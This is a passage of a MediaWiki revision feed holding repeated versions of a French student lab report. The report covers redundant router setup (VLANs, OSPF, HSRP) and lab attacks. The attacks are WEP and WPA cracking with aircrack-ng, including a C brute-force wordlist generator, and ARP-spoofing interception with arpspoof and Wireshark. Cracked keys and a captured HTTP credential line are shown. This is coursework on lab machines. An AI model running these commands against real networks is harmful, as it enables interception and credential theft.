Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Pastabox.site-2020-11-13-08_50_33-UTC.png&amp;diff=53562</id>
		<title>Fichier:Pastabox.site-2020-11-13-08 50 33-UTC.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Pastabox.site-2020-11-13-08_50_33-UTC.png&amp;diff=53562"/>
				<updated>2020-11-13T09:37:03Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53300</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53300"/>
				<updated>2020-11-06T09:56:58Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* attaque par homme du millieu */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53218</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53218"/>
				<updated>2020-11-04T17:28:36Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53208</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53208"/>
				<updated>2020-11-04T17:01:43Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* crackage Wpa */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
